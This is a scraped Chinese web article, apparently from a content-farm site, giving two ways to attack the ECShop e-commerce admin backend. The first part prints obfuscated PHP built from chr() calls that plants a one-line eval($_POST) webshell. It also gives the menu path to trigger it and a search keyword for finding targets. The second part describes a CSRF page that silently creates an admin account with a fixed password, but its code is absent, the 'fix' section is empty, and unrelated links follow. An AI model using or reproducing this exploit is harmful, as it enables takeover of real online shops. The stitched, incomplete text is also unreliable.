ecshop后台获取shell方法,通杀版本&后台低权限网站安全(通用2篇)
篇1:ecshop后台获取shell方法,通杀版本&后台低权限网站安全
后台可以提交构造代码绕过过滤,成功解析生成一句话木马.
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);
$a=chr(119);
$fp=@fopen($filen,$a);
$msg=@fwrite($fp,$filec);
if($msg) echo chr(79).chr(75).chr(33);
@fclose($fp);
?>
后台-订单管理-订单打印-选择源代码编辑-保存
返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功!
丢个关键字:Powered by ECShop
篇2:ecshop后台获取shell方法,通杀版本&后台低权限网站安全
所以,做好一个自动提交表单,且载入与一个隐藏的框架中,给管理员访问,管理员就中招了有木有!!!
POC:
代表乌云消灭你 Ecshop Csrf获取管理员权限测试 By VIP
给管理员访问这个页面后,页面没有变化,但是后台其实已经增加了一个用户名wooyun 邮箱root@wooyun.org 密码wooyuntest123的管理员 有木有!!!
修复方案:
【ecshop后台获取shell方法,通杀版本&后台低权限网站安全】相关文章:
Discuz 7.07.2后台拿Shell网站安全05-13
网站后台管理系统论文05-14
网站后台承诺书范文06-17
网站后台管理系统论文提纲11-15
银行后台后台工作总结05-05
财税统计后台04-16
后台朋友作文04-27
电商系统后台短信06-27
教师随笔:后台朋友05-08